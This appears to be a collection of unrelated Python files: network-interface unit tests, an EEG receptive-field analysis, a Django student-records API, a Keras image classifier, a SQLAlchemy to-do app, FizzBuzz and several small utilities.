self.assertIsNone(linux_net._parse_pf_number("p7"))
self.assertEqual(linux_net._parse_pf_number("pf31"), "31")
self.assertIsNone(linux_net._parse_pf_number("g4rbl3d"))
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port(self, mock_get_function_by_ifname,
mock_listdir, mock_isfile, mock_open):
mock_listdir.return_value = [
'pf_ifname', 'rep_vf_1', 'rep_vf_2'
]
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id', 'pf_sw_id', '1', 'pf_sw_id', 'pf0vf2'])
# PCI IDs mocked:
# PF0: 0000:0a:00.0
# PF0VF1: 0000:0a:02.1 PF0VF2: 0000:0a:02.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.0", True),
("0000:0a:02.1", False),
("0000:0a:02.2", False), ("0000:0a:00.0", True)])
open_calls = (
[mock.call('/sys/class/net/pf_ifname/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None),
mock.call('/sys/class/net/rep_vf_1/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None),
mock.call('/sys/class/net/rep_vf_1/phys_port_name', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None),
mock.call('/sys/class/net/rep_vf_2/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None),
mock.call('/sys/class/net/rep_vf_2/phys_port_name', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None)])
ifname = linux_net.get_representor_port('pf_ifname', '2')
mock_open.assert_has_calls(open_calls)
self.assertEqual('rep_vf_2', ifname)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port_2_pfs(
self, mock_get_function_by_ifname, mock_listdir, mock_isfile,
mock_open):
mock_listdir.return_value = [
'pf_ifname1', 'pf_ifname2', 'rep_pf1_vf_1', 'rep_pf1_vf_2',
'rep_pf2_vf_1', 'rep_pf2_vf_2',
]
mock_isfile.side_effect = [True, True, True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id',
'pf_sw_id', 'VF1@PF1', 'pf_sw_id', 'vf2@pf1',
'pf_sw_id', 'pf2vf1', 'pf_sw_id', 'pf2vf2'])
# PCI IDs mocked:
# PF1: 0000:0a:00.1 PF2: 0000:0a:00.2
# PF1VF1: 0000:0a:02.1 PF1VF2: 0000:0a:02.2
# PF2VF1: 0000:0a:04.1 PF2VF2: 0000:0a:04.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.1", True), ("0000:0a:00.2", True),
("0000:0a:02.1", False), ("0000:0a:00.2", True),
("0000:0a:02.2", False), ("0000:0a:00.2", True),
("0000:0a:04.1", False), ("0000:0a:00.2", True),
("0000:0a:04.2", False), ("0000:0a:00.2", True)])
ifname = linux_net.get_representor_port('pf_ifname2', '2')
self.assertEqual('rep_pf2_vf_2', ifname)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port_not_found(
self, mock_get_function_by_ifname, mock_listdir, mock_isfile,
mock_open):
mock_listdir.return_value = [
'pf_ifname', 'rep_vf_1', 'rep_vf_2'
]
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id', 'pf_sw_id', '1', 'pf_sw_id', '2'])
# PCI IDs mocked:
# PF0: 0000:0a:00.0
# PF0VF1: 0000:0a:02.1 PF0VF2: 0000:0a:02.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.0", True),
("0000:0a:02.1", False),
("0000:0a:02.2", False)])
self.assertRaises(
exception.RepresentorNotFound,
linux_net.get_representor_port,
'pf_ifname', '3'),
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port_exception_io_error(
self, mock_get_function_by_ifname, mock_listdir, mock_isfile,
mock_open):
mock_listdir.return_value = [
'pf_ifname', 'rep_vf_1', 'rep_vf_2'
]
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id', 'pf_sw_id', IOError(), 'pf_sw_id', '2'])
# PCI IDs mocked:
# PF0: 0000:0a:00.0
# PF0VF1: 0000:0a:02.1 PF0VF2: 0000:0a:02.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.0", True),
("0000:0a:02.1", False),
("0000:0a:02.2", False), ("0000:0a:00.0", True)])
self.assertRaises(
exception.RepresentorNotFound,
linux_net.get_representor_port,
'pf_ifname', '3')
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port_exception_value_error(
self, mock_get_function_by_ifname, mock_listdir, mock_isfile,
mock_open):
mock_listdir.return_value = [
'pf_ifname', 'rep_vf_1', 'rep_vf_2'
]
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id', 'pf_sw_id', '1', 'pf_sw_id', 'a'])
# PCI IDs mocked:
# PF0: 0000:0a:00.0
# PF0VF1: 0000:0a:02.1 PF0VF2: 0000:0a:02.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.0", True),
("0000:0a:02.1", False),
("0000:0a:02.2", False)])
self.assertRaises(
exception.RepresentorNotFound,
linux_net.get_representor_port,
'pf_ifname', '3')
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
def test_physical_function_inferface_name(
self, mock_listdir, mock_isfile, mock_open):
mock_listdir.return_value = ['foo', 'bar']
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['', 'valid_switch'])
ifname = linux_net.get_ifname_by_pci_address(
'0000:00:00.1', pf_interface=True, switchdev=False)
self.assertEqual(ifname, 'foo')
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
def test_physical_function_inferface_name_with_switchdev(
self, mock_listdir, mock_isfile, mock_open):
mock_listdir.return_value = ['foo', 'bar']
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['', 'valid_switch'])
ifname = linux_net.get_ifname_by_pci_address(
'0000:00:00.1', pf_interface=True, switchdev=True)
self.assertEqual(ifname, 'bar')
@mock.patch.object(os, 'listdir')
def test_get_ifname_by_pci_address_exception(self, mock_listdir):
mock_listdir.side_effect = OSError('No such file or directory')
self.assertRaises(
exception.PciDeviceNotFoundById,
linux_net.get_ifname_by_pci_address,
'0000:00:00.1'
)
@mock.patch.object(os, 'readlink')
@mock.patch.object(glob, 'iglob')
def test_vf_number_found(self, mock_iglob, mock_readlink):
mock_iglob.return_value = [
'/sys/bus/pci/devices/0000:00:00.1/physfn/virtfn3',
]
mock_readlink.return_value = '../../0000:00:00.1'
vf_num = linux_net.get_vf_num_by_pci_address('0000:00:00.1')
self.assertEqual(vf_num, '3')
@mock.patch.object(os, 'readlink')
@mock.patch.object(glob, 'iglob')
def test_vf_number_not_found(self, mock_iglob, mock_readlink):
mock_iglob.return_value = [
'/sys/bus/pci/devices/0000:00:00.1/physfn/virtfn3',
]
mock_readlink.return_value = '../../0000:00:00.2'
self.assertRaises(
exception.PciDeviceNotFoundById,
linux_net.get_vf_num_by_pci_address,
'0000:00:00.1'
)
@mock.patch.object(os, 'readlink')
@mock.patch.object(glob, 'iglob')
def test_get_vf_num_by_pci_address_exception(
self, mock_iglob, mock_readlink):
mock_iglob.return_value = [
'/sys/bus/pci/devices/0000:00:00.1/physfn/virtfn3',
]
mock_readlink.side_effect = OSError('No such file or directory')
self.assertRaises(
exception.PciDeviceNotFoundById,
linux_net.get_vf_num_by_pci_address,
'0000:00:00.1'
)
|
# Fagprojekt
# mTRF in Python
# Load dependencies
import numpy as np
import matplotlib.pyplot as plt
from scipy.io import loadmat
from os.path import join
import mne
from mne.decoding import ReceptiveField
from sklearn.model_selection import KFold
from sklearn.preprocessing import scale
# The following is from example method from mne.tools #
#######################################################
## Load data from publication
path = mne.datasets.mtrf.data_path()
decim = 2
data_mne = loadmat(join(path, "speech_data.mat"))
raw = data_mne["EEG"].T
speech = data_mne["envelope"].T
sfreq = float(data_mne["Fs"])
sfreq /= decim
speech = mne.filter.resample(speech, down = decim, npad = "auto")
raw = mne.filter.resample(raw, down = decim, npad = "auto")
# Read in channel positions and create MNE object from raw data
montage = mne.channels.make_standard_montage("biosemi128")
#info = mne.create_info(montage.ch_names, sfreq, "eeg").set_montage(montage)
info = mne.create_info(montage.ch_names, sfreq, "eeg", montage = montage)
raw = mne.io.RawArray(raw, info)
n_channels = len(raw.ch_names)
# Plot a sample of brain and stimulus activity
fig, ax = plt.subplots()
lns = ax.plot(scale(raw[:, :800][0].T), color = "k", alpha = .1)
ln1 = ax.plot(scale(speech[0, :800]), color = "r", lw = 2)
ax.legend([lns[0], ln1[0]], ["EEG", "Speech Envelope"], frameon = False)
ax.set(title = "Sample activity", xlabel = "Time (s)")
mne.viz.tight_layout()
#%%
## Create and fit a receptive field model
# Define the delays that we will use in the receptive field
tmin, tmax = -.2, .4
# Initialize the model
rf = ReceptiveField(tmin, tmax, sfreq, feature_names = ["envelope"],
estimator = 1.,
scoring = "corrcoef")
# We'll have (tmax - tmin) * sfreq delays
# and an extra 2 delays since we are inclusive on the beginning / end index
n_delays = int((tmax - tmin) * sfreq) + 2
n_splits = 3
cv = KFold(n_splits)
# Prepare model data (make time the first dimension)
speech = speech.T
Y, _ = raw[:] # Output for the model
Y = Y.T
# Iterate through splits, fit the model, and predict/test on held-out data
coefs = np.zeros((n_splits, n_channels, n_delays))
scores = np.zeros((n_splits, n_channels))
for ii, (train, test) in enumerate(cv.split(speech)):
print("split %s /%s" % (ii + 1, n_splits))
rf.fit(speech[train], Y[train])
scores[ii] = rf.score(speech[test], Y[test])
# coef_ is shape (n_outputs, n_features, n_delays). We only have 1 feature
coefs[ii] = rf.coef_[:, 0, :]
times = rf.delays_ / float(rf.sfreq)
# Average scores and coefficients across CV splits
mean_coefs = coefs.mean(axis = 0)
mean_scores = scores.mean(axis = 0)
# Plot mean prediciton scores across all channels
fig, ax = plt.subplots()
ix_chs = np.arange(n_channels)
ax.plot(ix_chs, mean_scores)
ax.axhline(0, ls = "--", color = "r")
ax.set(title = "Mean prediction score", xlabel = "Channel", ylabel = "Score ($r$)")
mne.viz.tight_layout()
#%%
## Investigate model coefficients
# Print mean coefficients across all time delays / channels
time_plot = 0.180 # For highlighting a specific time
fix, ax = plt.subplots(figsize=(4, 8))
max_coef = mean_coefs.max()
ax.pcolormesh(times, ix_chs, mean_coefs, cmap = "RdBu_r",
vmin = -max_coef, vmax = max_coef,
shading = "gouraud")
ax.axvline(time_plot, ls = "--", color = "k", lw = 2)
ax.set(xlabel = "Delay (s)", ylabel = "Channel", title = "Mean model\nCoefficients",
xlim = times[[0, -1]], ylim = [len(ix_chs) - 1, 0],
xticks = np.arange(tmin, tmax + .2, .2))
plt.setp(ax.get_xticklabels(), rotation = 45)
mne.viz.tight_layout()
# Make a topographic map of coefficients for a given delay
ix_plot = np.argmin(np.abs(time_plot - times))
fix, ax = plt.subplots()
mne.viz.plot_topomap(mean_coefs[:, ix_plot], pos = info, axes = ax, show = False,
vmin = -max_coef, vmax = max_coef)
ax.set(title = "Topomap of model coefficients\nfor delay %s" % time_plot)
mne.viz.tight_layout()
#%%
## Create and fit a stimulus reconstruction model
# We use the same lags as in [1]. Negative lags now index the relationship
# between the neural response and the speech envelope earlier in time, whereas
# positive lags would index how a unit change in the amplitude of the EEG would
# affect later stimulus activity (obviously this should have an amplitude of
# zero).
tmin, tmax = -.2, 0.
# Initialize the model. Here the features are the EEG data. We also specify
# ``patterns=True`` to compute inverse-transformed coefficients during model
# fitting. We'll use a ridge regression estimator with an
# alpha value similar to the publication.
sr = ReceptiveField(tmin, tmax, sfreq, feature_names = raw.ch_names,
estimator = 1e4, scoring = "corrcoef", patterns = True)
# We'll have (tmax - tmin) * sfreq delays
# and an extra 2 delays since we are inclusive on the beginning / end index
n_delays = int((tmax - tmin) * sfreq) + 2
n_splits = 3
cv = KFold(n_splits)
# Iterate through splits, fit the model, and predict/test on held-out data
coefs = np.zeros((n_splits, n_channels, n_delays))
patterns = coefs.copy()
scores = np.zeros((n_splits,))
for ii, (train, test) in enumerate(cv.split(speech)):
print("split %s / %s" % (ii + 1, n_splits))
sr.fit(Y[train], speech[train])
scores[ii] = sr.score(Y[test], speech[test])[0]
# coef_ is shape (n_outputs, n_features, n_delays). We have 128 features
coefs[ii] = sr.coef_[0, :, :]
patterns[ii] = sr.patterns_[0, :, :]
times = sr.delays_ / float(sr.sfreq)
# Average scores and coefficients across CV splits
mean_coefs = coefs.mean(axis = 0)
mean_patterns = patterns.mean(axis = 0)
mean_scores = scores.mean(axis = 0)
max_coef = np.abs(mean_coefs).max()
max_patterns = np.abs(mean_patterns).max()
#%%
## Visualize stimulus reconstruction
y_pred = sr.predict(Y[test])
time = np.linspace(0, 2., 5 * int(sfreq))
fig, ax = plt.subplots(figsize = (8, 4))
ax.plot(time, speech[test][sr.valid_samples_][:int(5 * sfreq)],
color = "grey", lw = 2, ls = "--")
ax.plot(time, y_pred[sr.valid_samples_][:int(5 * sfreq)], color = "r", lw = 2)
ax.legend([lns[0], ln1[0]], ["Envelope", "Reconstruction"], frameon = False)
ax.set(title = "Stimulus reconstruction")
ax.set_xlabel("Time (s)")
mne.viz.tight_layout()
#%%
## Investigate model coefficients
time_plot = (-.140, -.125) # To average between two timeplots
ix_plot = np.arange(np.argmin(np.abs(time_plot[0] - times)),
np.argmin(np.abs(time_plot[1] - times)))
fix, ax = plt.subplots(1, 2)
mne.viz.plot_topomap(np.mean(mean_coefs[:, ix_plot], axis = 1),
pos = info, axes = ax[0], show = False,
vmin = -max_coef, vmax = max_coef)
ax[0].set(title = "Model coefficients\nbetween delays %s and %s" % (time_plot[0], time_plot[1]))
mne.viz.plot_topomap(np.mean(mean_patterns[:, ix_plot], axis = 1),
pos = info, axes = ax[1],
show = False, vmin = -max_patterns, vmax = max_patterns)
ax[1].set(title = "Inverse_transformed coefficients\nbetween delays %s and %s" % (time_plot[0], time_plot[1]))
mne.viz.tight_layout()
plt.show()
|
from django.shortcuts import render
from rest_framework.decorators import api_view
from rest_framework.response import Response
import sys
#from django.http import JsonResponse
from .serializers import StudentrecordsSerializer
from .models import Studentrecord
@api_view(['GET'])
def apiInfo(request):
api_urls = {
'ViewAll':'/students-records/view-all/',
'ViewOne':'/students-records/view/<rollno>',
'Create':'/students-records/create/',
'Update':'/students-records/update/<str:Id>',
'Delete':'/students-records/delete/<str:Id>',
}
return Response(api_urls)
@api_view(['GET'])
def viewallrecords(request):
students = Studentrecord.objects.all().order_by('-Percentage')
serializer = StudentrecordsSerializer(students, many=True)
return Response(serializer.data)
@api_view(['GET'])
def viewStudentrecord(request, rollno):
students = Studentrecord.objects.get(RollNo=rollno)
serializer = StudentrecordsSerializer(students, many=False)
return Response(serializer.data)
@api_view(['GET'])
def viewsortbystudentrecord(request, field):
students = Studentrecord.objects.all().order_by(field)
serializer = StudentrecordsSerializer(students, many=True)
return Response(serializer.data)
@api_view(['POST'])
def createnewrecord(request):
serializer = StudentrecordsSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
error={"Error":"NOT VALID"}
return Response(error)
@api_view(['POST'])
def updatestudentrecord(request, pk):
record = Studentrecord.objects.get(Id=pk)
serializer = StudentrecordsSerializer(instance=record, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
error={"Error":"Some Error Occurred"}
return Response(error)
@api_view(['POST'])
def deletestudentrecord(request, pk):
obj = Studentrecord.objects.get(Id=pk)
obj.delete()
return Response('Item succsesfully delete!')
|
def encryptionMode(encryptionAlgorithm):
modeInput = input("What would you like to do? ")
return modeInput
def shiftSelect(shift):
shiftInput = -26 #initalize shift input to an invalid input
while shiftInput > 25 or shiftInput < -25:
#I have cast here instead as in this case I only have to do
#it once
shiftInput = int(input("What is your shift? "))
#I want it to restart from the top of this function is these conditions are made.
#If this condition is not met, then it returns the shift.
#I will use this in the function that is specific for each algorithm.
#Solution:
#You want to put it in a loop. You could do this a variety of ways
#We need to know more about what you want to return. I am going to assume
#that you want to do something with this function after the shiftinput is
#taken
if shiftInput > 25 or shiftInput < -25:
print("Try Again")
print("Out of loop") #Just to show you have exited loop
#You have to actually call the function
shiftSelect(9)
#One other question, should I use a different class for each algorithm?
#So depending on the requested algorithm and the requested shift(if appliable)
#Then it would run a specific class etc. (Is that the best use of the class?)
#Comment:
#Note that you would not create a class for each encription algorithm.
#What you might do is create a Message class that contains a string as
#a field that stores the message. Then you would have the encription
#algorithms as methods (behviours) that you apply. |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# File Name: 练习4_红包
# Description :
# Author : SanYapeng
# date: 2019-05-01
# Change Activity: 2019-05-01:
import random
"""
基本单位 0.01 获取到的金额必须大于这个数,才能生效
金额和红包个数整除为基本数,那么金额就位0.01
第一个红包金额随机,但是必须得小于输入金额
"""
import random
# summoney=input("please input the amount of money:")
# divide_n=input("divide into?:")
def hongbao(money,n):
k = n
sum = 0#sum为前n个人抢得的总和,为了方便计算最后一个人的金额,初始值为0
round = n#剩余人次
while k > 1:
current_money = money # 当前剩余的钱,初始值为money
for i in range(1, n+1):
get_money = random.randint(0, int( 2 * current_money / round))
print('id[%s] have geted money %s'%(i, get_money))
current_money -= get_money
round -= 1
sum += get_money
k-=1
if k==1:#最后一个人,分得剩余的所有
print('id[%s] have geted money %s'%(n,money-sum))
hongbao(100,10)
|
#!/usr/bin/env python
import cPickle, sys, shutil, time, os, magic
def unpickler():
unpic_file = open('myPickle', 'r')
cPickle.Unpickler(unpic_file)
temp = cPickle.load(unpic_file)
unpic_file.close()
printer(temp)
return temp
def printer(tmp_file):
print '%-50s%-30s%-30s%-10s%-15s\n'%('File',
'Created Time',
'Modified Time',
'File Size',
'File Info')
for tmp_tuple in enumerate(tmp_file):
meta_data = magic.from_file(tmp_tuple[1])
created_time = time.ctime(os.path.getctime(tmp_tuple[1]))
modified_time = time.ctime(os.path.getmtime(tmp_tuple[1]))
file_size = os.path.getsize(tmp_tuple[1])
print '%-50s%-30s%-30s%-10s%-15s'%(tmp_tuple[1],\
created_time,\
modified_time,\
file_size,\
meta_data)
|
#!/usr/bin/env runaiida
# -*- coding: utf-8 -*-
import os
import click
@click.command('cli')
@click.argument('codelabel')
@click.option('--submit', is_flag=True, help='Actually submit calculation')
def main(codelabel, submit):
"""Command line interface for testing and submitting calculations.
This script extends submit.py, adding flexibility in the selected code/computer.
Run './cli.py --help' to see options.
"""
code = Code.get_from_string(codelabel)
# set up calculation
calc = code.new_calc()
calc.label = "compute rips from distance matrix"
calc.set_max_wallclock_seconds(1 * 60)
calc.set_withmpi(False)
calc.set_resources({"num_machines": 1, "num_mpiprocs_per_machine": 1})
# Prepare input parameters
from aiida.orm import DataFactory
Parameters = DataFactory('gudhi.rdm')
parameters = Parameters(dict={'max-edge-length': 4.2})
calc.use_parameters(parameters)
SinglefileData = DataFactory('singlefile')
distance_matrix = SinglefileData(
file=os.path.join(gt.TEST_DIR, 'sample_distance.matrix'))
calc.use_distance_matrix(distance_matrix)
if submit:
calc.store_all()
calc.submit()
print("submitted calculation; calc=Calculation(uuid='{}') # ID={}"\
.format(calc.uuid,calc.dbnode.pk))
else:
subfolder, script_filename = calc.submit_test()
path = os.path.relpath(subfolder.abspath)
print("submission test successful")
print("Find remote folder in {}".format(path))
print("In order to actually submit, add '--submit'")
if __name__ == '__main__':
main()
|
#nvidia-smi
#~/.keras/keras.json
#import keras
#print keras.__version__
#1.2.2
#https://faroit.github.io/keras-docs/1.2.2/
from keras.models import Sequential
from keras.layers.pooling import MaxPooling2D
from keras.layers.core import Dense
from keras.layers.core import Flatten
from keras.layers.core import Dropout
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.models import model_from_json
from keras.layers.normalization import BatchNormalization
from keras.optimizers import Adam
from keras.preprocessing.image import ImageDataGenerator
from sklearn.metrics import roc_auc_score
#check
#from tensorflow.python.client import device_lib
#print(device_lib.list_local_devices())
#load previous model
#json_file = open('cnn_model_3.json', 'r')
#loaded_model_json = json_file.read()
#json_file.close()
#classification = model_from_json(loaded_model_json)
classification = Sequential()
classification.add(Conv2D(16, 3,3, input_shape=(128, 128, 3), activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Conv2D(64, 3,3, activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Conv2D(128, 3,3, activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Conv2D(256, 3,3, activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Conv2D(512, 3,3, activation = 'relu'))
classification.add(MaxPooling2D())
classification.add(Dropout(0.25))
classification.add(Flatten())
classification.add(Dense(1024, activation = 'relu'))
classification.add(BatchNormalization())
classification.add(Dense(1, activation = 'sigmoid'))
adam_optimizer = Adam(lr=0.0001, decay=1e-6)
classification.compile(optimizer=adam_optimizer, loss='binary_crossentropy', metrics = ['accuracy'])
for layer in classification.layers:
print(str(layer.name)+" "+str(layer.input_shape)+" -> "+str(layer.output_shape))
#train on all training set
train_all_data_gen = ImageDataGenerator(rotation_range=30, shear_range=0.2, zoom_range=0.2, horizontal_flip=True, vertical_flip=True, fill_mode='nearest', width_shift_range = 0.2,
height_shift_range = 0.2)
train_all_gen = train_all_data_gen.flow_from_directory('training_set_all', target_size=(128, 128), batch_size=25, class_mode='binary')
classification.fit_generator(train_all_gen, samples_per_epoch=2295, nb_epoch=20)
#score 0.964
classification.fit_generator(train_all_gen, samples_per_epoch=2295, nb_epoch=10)
#score 0.978
#mv test/*.jpg test/unknown/
test_data_gen = ImageDataGenerator()
test_gen = test_data_gen.flow_from_directory('test', target_size=(128, 128), batch_size=25, class_mode='binary', shuffle=False)
prediction = classification.predict_generator(test_gen, 1531)
result = []
filenames = test_gen.filenames
for i in range(len(filenames)):
result.append((int(filenames[i].split("/")[1].split(".")[0]), prediction[i][0]))
result.sort(key=lambda tup: tup[0])
with open("submission7_all_4.csv", "w") as output:
output.write("name,invasive\n")
for i in range(0, len(result)):
output.write(str(result[i][0])+","+str(result[i][1])+"\n")
|
#!/usr/bin/python3.6
import os
import sys
import argparse
from subprocess import call
parser = argparse.ArgumentParser(description='Use inkscape to convert a file from svg to png.')
parser.add_argument('file', type=argparse.FileType('r'), nargs='+', default=None, help='SVG file')
args = parser.parse_args()
# print(args.file)
for f in args.file:
fstring, fextension = os.path.splitext(f.name)
if not fextension == '.svg':
parser.print_usage()
sys.exit()
pngfile = fstring+'.png'
# print(f.name)
# print(pngfile)
call(['inkscape', '--verb=FitCanvasToDrawing', '--verb=FileSave', '--verb=FileQuit', f.name])
call(['inkscape', '-z', '--export-dpi=300', f.name, '-e', pngfile])
|
# To-Do List
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, Date
from sqlalchemy.orm import sessionmaker
from datetime import datetime, timedelta
class DBCon:
Base = declarative_base()
def db_session(self):
engine = create_engine('sqlite:///todo.db?check_same_thread=false')
self.Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
session.commit()
return session
class Table(DBCon.Base):
__tablename__ = 'task'
id = Column(Integer, primary_key=True)
task = Column(String)
deadline = Column(Date, default=datetime.today().date())
def __repr__(self):
return 'id={}, task={}, deadline={}'.format(self.id, self.task, self.deadline)
class ToDoList:
_session = None
def __init__(self, session):
self._session = session
def add_single_row(self, single_row_data):
self._session.add(single_row_data)
self._session.commit()
def get_all_table_rows_by_date(self, day):
rows = self._session.query(Table).filter(Table.deadline == day).all()
self._session.commit()
return rows
def get_all_tasks(self):
rows = self._session.query(Table.task, Table.deadline).order_by(Table.deadline).all()
self._session.commit()
return rows
def get_all_tasks_by_date(self):
day = datetime.today().date()
rows = self._session.query(Table.task, Table.deadline).filter(Table.deadline < day).order_by(
Table.deadline).all()
self._session.commit()
return rows
def delete_row_by_task_date(self, task, date):
self._session.query(Table).filter(Table.task == task, Table.deadline == date).delete()
self._session.commit()
return True
@staticmethod
def take_input():
print("1) Today's tasks")
print("2) Week's tasks")
print('3) All tasks')
print('4) Missed tasks')
print('5) Add task')
print('6) Delete task')
print('0) Exit')
return input()
@staticmethod
def take_task_input():
print('Enter task')
task = input()
print('Enter deadline') # YYYY-MM-DD
deadline = input()
return task, deadline
def print_today_task(self, day=None, week_task=False):
if day is None:
day = datetime.today().date()
which_day = 'Today'
if week_task:
which_day = day.strftime("%A")
print('{} {} {}:'.format(which_day, day.day, day.strftime('%b')))
table_rows = self.get_all_table_rows_by_date(day)
if len(table_rows) >= 1:
for id_n, row in enumerate(table_rows):
print('{}. {}'.format(id_n + 1, row.task))
else:
print('Nothing to do!')
print()
def print_week_task(self):
today = datetime.today().date()
for day_diff in range(7):
req_date = today + timedelta(days=day_diff)
self.print_today_task(req_date, week_task=True)
def print_all_tasks(self):
task_rows = self.get_all_tasks()
if len(task_rows) >= 1:
print('All tasks:')
for id_n, task_row in enumerate(task_rows):
day = task_row[1]
print('{}. {}. {} {}'.format(id_n + 1, task_row[0], day.day, day.strftime('%b')))
def add_tasks(self):
input_task, deadline = self.take_task_input()
task_row = Table(task=input_task, deadline=datetime.strptime(deadline, '%Y-%m-%d'))
self.add_single_row(task_row)
print('The task has been added!')
def missed_tasks(self):
task_rows = self.get_all_tasks_by_date()
if len(task_rows) >= 1:
print('Missed tasks:')
for id_n, task_row in enumerate(task_rows):
day = task_row[1]
print('{}. {}. {} {}'.format(id_n + 1, task_row[0], day.day, day.strftime('%b')))
print()
def delete_task(self):
task_rows = self.get_all_tasks_by_date()
if len(task_rows) >= 1:
print('Chose the number of the task you want to delete:')
task_info = dict()
for id_n, task_row in enumerate(task_rows):
task = task_row[0]
day = task_row[1]
task_id = id_n + 1
task_info[task_id] = [task, day]
print('{}. {}. {} {}'.format(task_id, task, day.day, day.strftime('%b')))
task_id = int(input().strip())
task_to_delete = task_info[task_id][0]
task_date = task_info[task_id][1]
if self.delete_row_by_task_date(task_to_delete, task_date):
print('The task has been deleted!')
else:
print('Nothing to delete')
# Run program
db_sess = DBCon().db_session()
toDoList = ToDoList(db_sess)
while True:
work_input = toDoList.take_input()
if work_input == '1':
toDoList.print_today_task()
elif work_input == '2':
toDoList.print_week_task()
elif work_input == '3':
toDoList.print_all_tasks()
elif work_input == '4':
toDoList.missed_tasks()
elif work_input == '5':
toDoList.add_tasks()
elif work_input == '6':
toDoList.delete_task()
elif work_input == '0':
print('Bye!')
quit()
|
__author__ = 'sonic-server'
from handler import *
handlers = [
(r'/', home_handler),
(r'/api/dataChannel', data_handler),
(r'/api/ctrl', ctrl_handler)
]
modules = {
}
|
#!/usr/bin/env python
import json
from solidfire.common import ApiServerError
from tests.base_test import SolidFireBaseTest
class TestApiServerError(SolidFireBaseTest):
def test_should_provide_defaults_with_empty_string(self):
api_error = ApiServerError('aMethod', '')
self.assertEqual(api_error.error_name, 'Unknown')
self.assertEqual(api_error.error_code, 500)
self.assertEqual(api_error.message, None)
def test_should_provide_defaults(self):
api_error = ApiServerError('aMethod', '{}')
self.assertEqual(api_error.error_name, 'Unknown')
self.assertEqual(api_error.error_code, 500)
self.assertEqual(api_error.message, None)
def test_should_convert_code_to_int(self):
api_error = ApiServerError('aMethod', '{"error": {"code": "404"}}')
self.assertEqual(api_error.error_code, 404)
def test_should_map_provided_json(self):
api_error = ApiServerError(
'aMethod',
'{ \
"error" : { \
"name": "error_name", \
"code": 505, \
"message": "aMessage" \
} \
}',
)
self.assertEqual(api_error.error_name, 'error_name')
self.assertEqual(api_error.error_code, 505)
self.assertEqual(api_error.message, 'aMessage')
|
#!/usr/bin/env python3
from argparse import ArgumentParser
def calc_fizzbuzz(n, rules=None):
string = ''
for divisor, result in rules.items():
if n % divisor == 0:
string += result
if string == '':
string += str(n)
return string
def create_rules():
print('Welcome to the interactive rule generator, to exit submit an empty string as a divisor')
ruleset = {}
while True:
temp = input('Please enter a divisor: ')
if temp == '':
break
try:
ruleset[int(temp)] = input('Please enter the result: ')
except ValueError:
print('You entered an invalid divisor, please try again')
return ruleset
def fizzbuzz(max, rules=None):
for i in range(1, max + 1):
print(calc_fizzbuzz(i, rules))
if __name__ == '__main__': # pragma: no cover
parser = ArgumentParser(description="Pass in your fizzbuzz numba!!!")
parser.add_argument(
"n", help='Please provide a positive integer for the maximum value')
parser.add_argument("-i", help='Use this option to enter interactive mode and define the rules before executing',
dest='interactive', action='store_true')
args = parser.parse_args()
try:
n = int(args.n)
except ValueError:
print("You entered an invalid maximum value, please try again")
exit(1)
if args.interactive:
# interactive mode selected
ruleset = create_rules()
else:
# defaulting to FizzBuzzBazz
ruleset = {3: 'Fizz', 5: 'Buzz', 7: 'Bazz'}
fizzbuzz(n, ruleset)
|
